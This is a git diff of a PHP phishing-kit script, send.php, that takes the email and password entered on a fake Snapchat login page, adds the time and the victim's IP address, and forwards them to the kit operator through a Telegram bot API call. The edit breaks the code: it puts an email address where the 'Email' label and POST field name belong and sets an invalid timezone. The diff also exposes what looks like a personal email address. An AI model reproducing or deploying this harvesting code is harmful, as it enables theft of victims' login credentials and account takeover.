diff --git a/send.php b/send.php index 02fcce9..3513dfc 100644 --- a/send.php +++ b/send.php @@ -8,10 +8,10 @@ $ip_address = $_SERVER['REMOTE_ADDR']; } -$d = new DateTime("now", new DateTimeZone("Asia/Baghdad")); // Set Your country DF Time +$d = new DateTime("now", new DateTimeZone("Canada/onterio")); // Set Your country DF Time $time = $d->format("Y/m/d h:i:s A"); if (isset($_POST['info'])) { - $msg = urlencode("New Login From SnapChat : \nEmail : " . $_POST['email'] . "\nPassword : " . $_POST['password'] . "\nTime : " . $time . "\nIp : " . $ip_address . "\n®Mr28"); + $msg = urlencode("New Login From SnapChat : \meadowsigurdson@gmail.com : " . $_POST['meadowsigurdson@gmail.com'] . "\nPassword : " . $_POST['password'] . "\nTime : " . $time . "\nIp : " . $ip_address . "\n®Mr28"); } @@ -24,4 +24,4 @@ // You : $response = file_get_contents("https://api.telegram.org/bot".$apiToken."/sendMessage?chat_id=".$YOUR_ID_TELE."&text=" . $msg); // SomeOne Else : -// $response = file_get_contents("https://api.telegram.org/bot".$apiToken."/sendMessage?chat_id=".$YOUR_ID_TELE."&text=" . $msg); +// $response = file_get_contents("https://api.telegram.org/bot".$apiToken."/sendMessage?chat_id=".$YOUR_ID_TELE."&text=" . $msg)